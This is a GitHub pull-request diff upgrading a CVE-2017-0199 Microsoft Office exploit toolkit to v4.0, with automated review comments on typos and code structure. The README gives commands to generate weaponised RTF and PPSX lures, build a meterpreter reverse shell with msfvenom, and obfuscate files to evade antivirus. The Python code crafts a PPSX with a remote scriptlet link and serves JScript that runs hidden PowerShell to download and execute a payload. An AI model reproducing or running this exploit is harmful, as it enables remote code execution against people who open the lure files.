Merge pull request #45 from bhdresh/v4.0-beta
V4.0-beta
bhdresh authored Aug 3, 2017
2 parents 9b66127 + 3ca62ca commit 665d5cd
Showing 4 changed files with 301 additions and 149 deletions.
42 changes: 13 additions & 29 deletions README.md
@@ -1,43 +1,25 @@
## Exploit toolkit CVE-2017-0199 - v3.0
## Exploit toolkit CVE-2017-0199 - v4.0

Exploit toolkit CVE-2017-0199 - v3.0 is a handy python script which provides pentesters and security researchers a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious (Obfuscated) RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.

### Video tutorial (for v2.0)

https://youtu.be/42LjG7bAvpg
Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.

### Release note:

Introduced following capabilities to the script

- Generate Malicious Obfuscated RTF file ( using -x option ) to bypass AV
##### Detection rate before obfuscation

![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v2.0-beta-3/Invoice_Normal.jpeg)
##### Detection rate after obfuscation:
![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v2.0-beta-3/Invoice_Obfuscated.jpeg)

- Deliver custom HTA file ( using -H option )
- Deliver remote payload
- Generate Malicious PPSX file
- Exploitation mode for generated PPSX file

Version: Python version 2.7.13

### Future release:

Working on following feature

- Automatically send generated malicious RTF to victim using email spoofing


### Scenario 1: Deliver local payload
###### Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
###### Sequence diagram

![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario1.jpg)
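Review bot: the release note under "Introduced following capabilities to the script" lists the obfuscated RTF (-x), custom HTA (-H) and remote payload features, all of which the v3.0 docstring in this same commit already documents, alongside the two items that are actually new here (PPSX generation and the PPSX exploitation mode), and the "Detection rate" screenshots and the video link still point at v2.0 assets; split the list into what is new in v4.0 and what is carried over, and date or drop the stale images. The rewritten Scenario 1 gen command also drops "-x 1" and adds "-t RTF" without explanation; a sentence stating that RTF is the default type and that obfuscation is optional would stop readers guessing why the example changed.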
@@ -46,9 +28,9 @@ Working on following feature
### Scenario 2: Deliver Remote payload
###### Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Start toolkit in exploit mode to deliver remote payload
# python cve-2017-0199_toolkit.py -M exp -e http://remoteserver.com/shell.exe
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
###### Sequence diagram

![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario2.jpg)
@@ -57,9 +39,9 @@ Working on following feature
### Scenario 3: Deliver custom HTA file
###### Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Start toolkit in exploit mode to deliver custom HTA file
# python cve-2017-0199_toolkit.py -M exp -H /tmp/custom.hta
# python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
###### Sequence diagram

![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario3.jpg)
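Review bot: the rewritten gen command in this scenario keeps "-x 1" while the equivalent lines in Scenario 1 and Scenario 2 were rewritten without it; either all three examples should show the same flag set, or the text should say why this scenario differs. Since -t defaults to RTF, "-t RTF" here is a no-op, which is worth stating so readers do not assume it is mandatory.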
@@ -81,13 +63,15 @@ Working on following feature

-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.
-t RTF|PPSX (default = RTF) Type of the file to be generated.
-x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.

-M exp Start exploitation mode

Exploitation:
-t RTF|PPSX (default = RTF) Type of file to be exolited.
-H </tmp/custom.hta> Local path of a custom HTA file which needs to be delivered and executed on target.
NOTE: This option will not deliver payloads specified through options "-e" and "-l"
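Review bot: "exolited" in the new "-t RTF|PPSX" line under Exploitation should read "exploited". The "-u" description above it still says "The path to an hta file", but the -h output in this commit now calls it an HTA/SCT file because the PPSX type references the URL as a scriptlet; the README and the help text should use the same wording. Likewise the "-x" line here says "(default = 0)" while the help text now says "(RTF only)"; both facts are true and both belong in both places.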
@@ -104,7 +88,7 @@ This program is for Educational purpose ONLY. Do not use it without permission.

### Credit

@nixawk for RTF sample, @bhdresh
@nixawk for RTF sample, @Li Haifei, @bhdresh

### Bug, issues, feature requests

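Review bot: "@Li Haifei" in the Credit line contains a space, so unlike "@nixawk" and "@bhdresh" it will not render as a GitHub mention; use the actual handle, or drop the "@" and write the name plainly.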
1 change: 0 additions & 1 deletion TODO.txt
@@ -1,2 +1 @@
### Future release:
* Automatically send generated malicious RTF to victim using email spoofing
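Review bot: after this deletion TODO.txt is a single heading, "### Future release:", with nothing under it (the hunk header shows the file shrinking from two lines to one); either delete the file or leave a line saying that nothing is currently planned, so the heading does not read as truncated.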
407 changes: 288 additions & 119 deletions cve-2017-0199_toolkit.py
@@ -1,88 +1,15 @@
#!/usr/bin/env python
'''
## Exploit toolkit CVE-2017-0199 - v3.0 (https://github.com/bhdresh/CVE-2017-0199) ##
## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ##
Exploit toolkit CVE-2017-0199 - v3.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious (Obfuscated) RTF file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
### Scenario 1: Deliver local payload
Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
### Scenario 2: Deliver Remote payload
Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Start toolkit in exploit mode to deliver remote payload
# python cve-2017-0199_toolkit.py -M exp -e http://remoteserver.com/shell.exe
Scenario 3: Deliver custom HTA file
Example commands
1) Generate malicious RTF file
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Start toolkit in exploit mode to deliver custom HTA file
# python cve-2017-0199_toolkit.py -M exp -H /tmp/custom.hta
### Command line arguments:
# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
Modes:
-M gen Generate Malicious RTF file only
Generate malicious RTF file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
will be requested once victim will open malicious RTF file.
-x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.
-M exp Start exploitation mode
Exploitation:
-H </tmp/custom.hta> Local path of a custom HTA file which needs to be delivered and executed on target.
NOTE: This option will not deliver payloads specified through options "-e" and "-l".
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload.
'''

import os,sys,thread,socket,sys,getopt,binascii
import os,sys,thread,socket,sys,getopt,binascii,shutil,tempfile
from random import randint
from random import choice
from string import ascii_uppercase
from zipfile import ZipFile, ZIP_STORED, ZipInfo


BACKLOG = 50 # how many pending connections queue will hold
MAX_DATA_RECV = 999999 # max number of bytes we receive at once
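Review bot: only the first line of the module docstring was bumped to v4.0; the paragraph beneath it still says "v3.0" and "Microsoft RTF RCE", the three scenarios and the "Command line arguments" section still lack the "-t RTF|PPSX" option that the README and the -h output in this commit document, and the gen usage block still describes "-x" as "default = 0". Update the docstring together with the README, or replace it with a pointer to the README so there is one copy to maintain. Also, "sys" is still imported twice on the new import line; the added "shutil" and "tempfile" are needed by the new PPSX code, but drop the duplicate.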
@@ -95,38 +22,43 @@ def main(argv):
global docuri
global payloadurl
global payloadlocation
global customhta
global custom
global mode
global obfuscate
global payloadtype
filename = ''
docuri = ''
payloadurl = ''
payloadlocation = ''
customhta = ''
custom = ''
port = int("80")
host = ''
mode = ''
obfuscate = int("0")
payloadtype = 'rtf'

# Capture command line arguments
try:
opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","customhta=","obfuscate="])
opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:H:x:t:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation=","custom=","obfuscate=","payloadtype="])
except getopt.GetoptError:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)\n"
print "\nThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Office RCE)\n"
print "Modes:\n"
print " -M gen Generate Malicious RTF file only\n"
print " Generate malicious RTF file:\n"
print " -w <Filename.rtf> Name of malicious RTF file (Share this file with victim).\n"
print " -u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.\n"
print " -x 0|1 (default = 0) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n"
print " For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and\n"
print " will be requested once victim will open malicious RTF file.\n"
print " -M gen Generate Malicious file only\n"
print " Generate malicious payload:\n"
print " -w <Filename.rtf/Filename.ppsx> Name of malicious RTF/PPSX file (Share this file with victim).\n"
print " -u <http://attacker.com/test.hta> The path to an HTA/SCT file. Normally, this should be a domain or IP where this tool is running.\n"
print " For example, http://attacker.com/test.doc (This URL will be included in malicious file and\n"
print " will be requested once victim will open malicious RTF/PPSX file.\n"
print " -t RTF|PPSX (default = RTF) Type of the file to be generated.\n"
print " -x 0|1 (RTF only) Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n"
print " -M exp Start exploitation mode\n"
print " Exploitation:\n"
print " -H </tmp/custom.hta> Local path of a custom HTA file which needs to be delivered and executed on target.\n"
print " -t RTF|PPSX (default = RTF) Type of file to be exolited.\n"
print " -H </tmp/custom> Local path of a custom HTA/SCT file which needs to be delivered and executed on target.\n"
print " NOTE: This option will not deliver payloads specified through options \"-e\" and \"-l\".\n"
print " -p <TCP port:Default 80> Local port number.\n"
print " -e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.\n"
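Review bot: "exolited" in the new "-t RTF|PPSX" help line under Exploitation should read "exploited". The new "-u" line says the URL points to an "HTA/SCT file", but the example on the following line is "http://attacker.com/test.doc", which matches neither, and the README still shows "test.hta"; pick one example and use it in both places. The rewritten "-x" line dropped the "(default = 0)" that the README still shows; keep the default in the help text, since main() still initialises obfuscate to 0.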
@@ -144,44 +76,74 @@ def main(argv):
payloadurl = arg
elif opt in ("-l", "--payloadlocation"):
payloadlocation = arg
elif opt in ("-H","--customhta"):
customhta = arg
elif opt in ("-H","--custom"):
custom = arg
elif opt in ("-x","--obfuscate"):
obfuscate = int(arg)
elif opt in ("-t","--payloadtype"):
payloadtype = arg
if "gen" in mode:
if (len(filename)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(docuri)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if obfuscate == 1:
print "Generating obfuscated RTF file.\n"
generate_exploit_obfuscate_rtf()
if (len(payloadtype)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if payloadtype.upper() == 'RTF':
if obfuscate == 1:
print "Generating obfuscated RTF file.\n"
generate_exploit_obfuscate_rtf()
sys.exit()
if obfuscate == 0:
print "Generating normal RTF payload.\n"
generate_exploit_rtf()
sys.exit()
sys.exit()
if obfuscate == 0:
print "Generating normal RTF payload.\n"
generate_exploit_rtf()
if payloadtype.upper() == 'PPSX':
print "Generating normal PPSX payload.\n"
generate_exploit_ppsx()
sys.exit()
if payloadtype.upper() != 'RTF' and payloadtype.upper() != 'PPSX':
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
mode = 'Finished'
if "exp" in mode:
if (len(customhta)>1):
print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect"
exploitation()
sys.exit()
if (len(payloadurl)<1):
if payloadtype.upper() == 'RTF':
if (len(custom)>1):
print "Running exploit mode (Deliver Custom HTA) - waiting for victim to connect"
exploitation_rtf()
sys.exit()
if (len(payloadurl)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(payloadurl)>1 and len(payloadlocation)<1):
print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect"
exploitation_rtf()
sys.exit()
print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect"
exploitation_rtf()
mode = 'Finished'
if payloadtype.upper() == 'PPSX':
if (len(custom)>1):
print "Running exploit mode (Deliver Custom SCT) - waiting for victim to connect"
exploitation_ppsx()
sys.exit()
if (len(payloadurl)<1):
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(payloadurl)>1 and len(payloadlocation)<1):
print "Running exploit mode (Deliver SCT with remote payload) - waiting for victim to connect"
exploitation_ppsx()
sys.exit()
print "Running exploit mode (Deliver SCT + Local Payload) - waiting for victim to connect"
exploitation_ppsx()
mode = 'Finished'
if not "Finished" in mode:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(payloadurl)>1 and len(payloadlocation)<1):
print "Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect"
exploitation()
sys.exit()
print "Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect"
exploitation()
mode = 'Finished'
if not "Finished" in mode:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
def generate_exploit_rtf():
# Preparing malicious RTF
s = docuri
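Review bot: in gen mode with "-t RTF", an "-x" value other than 0 or 1 matches neither the "obfuscate == 1" nor the "obfuscate == 0" branch and control falls through to the bare "sys.exit()" with no message, so a typo such as "-x 2" exits silently; print the usage line there, or validate obfuscate immediately after parsing, next to the new "-t" check. The "if (len(payloadtype)<1)" guard can never trigger because payloadtype defaults to 'rtf'. The unsupported-type case is also handled inconsistently: gen mode checks "payloadtype.upper() != 'RTF' and payloadtype.upper() != 'PPSX'" explicitly, whereas exp mode relies on falling through to the "if not "Finished" in mode" fallback; unify the two. Finally, the long option for "-H" was renamed from "--customhta" to "--custom", which breaks existing invocations and is not mentioned in the release note.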
@@ -285,8 +247,124 @@ def generate_exploit_obfuscate_rtf():
f.close()
print "Generated obfuscated "+filename+" successfully"


def exploitation():
def generate_exploit_ppsx():
# Preparing malicious PPSX
shutil.copy2('template/template.ppsx', filename)
class UpdateableZipFile(ZipFile):
"""
Add delete (via remove_file) and update (via writestr and write methods)
To enable update features use UpdateableZipFile with the 'with statement',
Upon __exit__ (if updates were applied) a new zip file will override the exiting one with the updates
"""

class DeleteMarker(object):
pass

def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False):
# Init base
super(UpdateableZipFile, self).__init__(file, mode=mode,
compression=compression,
allowZip64=allowZip64)
# track file to override in zip
self._replace = {}
# Whether the with statement was called
self._allow_updates = False

def writestr(self, zinfo_or_arcname, bytes, compress_type=None):
if isinstance(zinfo_or_arcname, ZipInfo):
name = zinfo_or_arcname.filename
else:
name = zinfo_or_arcname
# If the file exits, and needs to be overridden,
# mark the entry, and create a temp-file for it
# we allow this only if the with statement is used
if self._allow_updates and name in self.namelist():
temp_file = self._replace[name] = self._replace.get(name,
tempfile.TemporaryFile())
temp_file.write(bytes)
# Otherwise just act normally
else:
super(UpdateableZipFile, self).writestr(zinfo_or_arcname,
bytes, compress_type=compress_type)

def write(self, filename, arcname=None, compress_type=None):
arcname = arcname or filename
# If the file exits, and needs to be overridden,
# mark the entry, and create a temp-file for it
# we allow this only if the with statement is used
if self._allow_updates and arcname in self.namelist():
temp_file = self._replace[arcname] = self._replace.get(arcname,
tempfile.TemporaryFile())
with open(filename, "rb") as source:
shutil.copyfileobj(source, temp_file)
# Otherwise just act normally
else:
super(UpdateableZipFile, self).write(filename,
arcname=arcname, compress_type=compress_type)

def __enter__(self):
# Allow updates
self._allow_updates = True
return self

def __exit__(self, exc_type, exc_val, exc_tb):
# call base to close zip file, organically
try:
super(UpdateableZipFile, self).__exit__(exc_type, exc_val, exc_tb)
if len(self._replace) > 0:
self._rebuild_zip()
finally:
# In case rebuild zip failed,
# be sure to still release all the temp files
self._close_all_temp_files()
self._allow_updates = False

def _close_all_temp_files(self):
for temp_file in self._replace.itervalues():
if hasattr(temp_file, 'close'):
temp_file.close()

def remove_file(self, path):
self._replace[path] = self.DeleteMarker()

def _rebuild_zip(self):
tempdir = tempfile.mkdtemp()
try:
temp_zip_path = os.path.join(tempdir, 'new.zip')
with ZipFile(self.filename, 'r') as zip_read:
# Create new zip with assigned properties
with ZipFile(temp_zip_path, 'w', compression=self.compression,
allowZip64=self._allowZip64) as zip_write:
for item in zip_read.infolist():
# Check if the file should be replaced / or deleted
replacement = self._replace.get(item.filename, None)
# If marked for deletion, do not copy file to new zipfile
if isinstance(replacement, self.DeleteMarker):
del self._replace[item.filename]
continue
# If marked for replacement, copy temp_file, instead of old file
elif replacement is not None:
del self._replace[item.filename]
# Write replacement to archive,
# and then close it (deleting the temp file)
replacement.seek(0)
data = replacement.read()
replacement.close()
else:
data = zip_read.read(item.filename)
zip_write.writestr(item, data)
# Override the archive with the updated one
shutil.move(temp_zip_path, self.filename)
finally:
shutil.rmtree(tempdir)

with UpdateableZipFile(filename, "a") as o:
o.writestr("ppt/slides/_rels/slide1.xml.rels", "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\
<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId3\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" Target=\"script:"+docuri+"\" TargetMode=\"External\"/><Relationship Id=\"rId2\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout\" Target=\"../slideLayouts/slideLayout1.xml\"/><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing\" Target=\"../drawings/vmlDrawing1.vml\"/></Relationships>")
print "Generated "+filename+" successfully"


def exploitation_rtf():

print "Server Running on ",host,":",port

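Review bot: UpdateableZipFile is defined inside generate_exploit_ppsx, so the class is re-created on every call and cannot be imported or tested on its own; move it to module level next to the zipfile/tempfile/shutil imports it depends on. The "shutil.copy2('template/template.ppsx', filename)" call is not wrapped in a try/except, so a missing template surfaces as a raw IOError traceback instead of the "Unable to read ..." style message the rest of this file uses for file errors; catch the exception and report it the same way. The "_close_all_temp_files" loop uses "itervalues", which pins this class to Python 2, consistent with the README's "Python version 2.7.13" but worth a comment since the rest of the zip code would otherwise port cleanly.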
@@ -334,16 +412,16 @@ def server_thread(conn, client_addr):
conn.close()
sys.exit(1)
# check if custom HTA flag is set
if (len(customhta)>1):
if (len(custom)>1):
print "Received request for custom HTA from "+client_addr[0]
try:
size = os.path.getsize(customhta)
size = os.path.getsize(custom)
except OSError:
print "Unable to read exe - "+customhta
print "Unable to read exe - "+custom
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/hta\r\n\r\n"
with open(customhta) as fin:
with open(custom) as fin:
data +=fin.read()
conn.send(data)
conn.close()
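Review bot: the error message on the renamed line still reads "Unable to read exe - " although the file being opened here is the custom HTA named by "-H"; the new PPSX handler later in this commit uses "Unable to read custom SCT file - ", so align this one to "Unable to read custom HTA file - ".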
@@ -356,7 +434,7 @@ def server_thread(conn, client_addr):
try:
size = os.path.getsize(payloadlocation)
except OSError:
print "Unable to read"+payloadlocation
print "Unable to read "+payloadlocation
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n"
@@ -383,5 +461,96 @@ def server_thread(conn, client_addr):
sys.exit(1)
except socket.error, ex:
print ex


def exploitation_ppsx():

print "Server Running on ",host,":",port

try:
# create a socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# associate the socket to host and port
s.bind((host, port))

# listenning
s.listen(BACKLOG)

except socket.error, (value, message):
if s:
s.close()
print "Could not open socket:", message
sys.exit(1)

# get the connection from client
while 1:
conn, client_addr = s.accept()

# create a thread to handle request
thread.start_new_thread(server_thread, (conn, client_addr))

s.close()

def server_thread(conn, client_addr):

# get the request from browser
try:
request = conn.recv(MAX_DATA_RECV)
if (len(request) > 0):
# parse the first line
first_line = request.split('\n')[0]

# get method
method = first_line.split(' ')[0]
# get url
try:
url = first_line.split(' ')[1]
except IndexError:
print "Invalid request from "+client_addr[0]
conn.close()
sys.exit(1)
# check if custom SCT flag is set
if (len(custom)>1):
print "Received request for custom SCT from "+client_addr[0]
try:
size = os.path.getsize(custom)
except OSError:
print "Unable to read custom SCT file - "+custom
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n"
with open(custom) as fin:
data +=fin.read()
conn.send(data)
conn.close()
sys.exit(1)
conn.close()
sys.exit(1)
check_exe_request = url.find('.exe')
if (check_exe_request > 0):
print "Received request for payload from "+client_addr[0]
try:
size = os.path.getsize(payloadlocation)
except OSError:
print "Unable to read"+payloadlocation
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n"
with open(payloadlocation) as fin:
data +=fin.read()
conn.send(data)
conn.close()
sys.exit(1)
if method in ['GET', 'get']:
print "Received GET method from "+client_addr[0]
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 1000\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/scriptlet\r\n\r\n<?XML version=\"1.0\"?>\r\n<package>\r\n<component id='giffile'>\r\n<registration\r\n description='Dummy'\r\n progid='giffile'\r\n version='1.00'\r\n remotable='True'>\r\n</registration>\r\n<script language='JScript'>\r\n<![CDATA[\r\n new ActiveXObject('WScript.shell').exec('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\\'"+payloadurl+"\\', \\'c:/windows/temp/shell.exe\\'); c:/windows/temp/shell.exe');\r\n]]>\r\n</script>\r\n</component>\r\n</package>\r\n"
conn.send(data)
conn.close()
sys.exit(1)
except socket.error, ex:
print ex


if __name__ == '__main__':
main(sys.argv[1:])
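Review bot: server_thread is now defined twice at module level, and the later definition in this hunk silently replaces the earlier one that exploitation_rtf's accept loop dispatches to, so with "-t RTF" the HTA handler defined above is never called and this SCT handler runs instead. Give the two handlers distinct names (for example server_thread_rtf and server_thread_ppsx), or keep a single handler that branches on payloadtype. exploitation_ppsx is otherwise a verbatim copy of exploitation_rtf, down to the "listenning" comment, so one listener taking the handler function as a parameter would remove the duplication. The copied handler also reintroduces the missing space in "print "Unable to read"+payloadlocation" that the hunk above fixed in the RTF copy.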
Binary file added template/template.ppsx
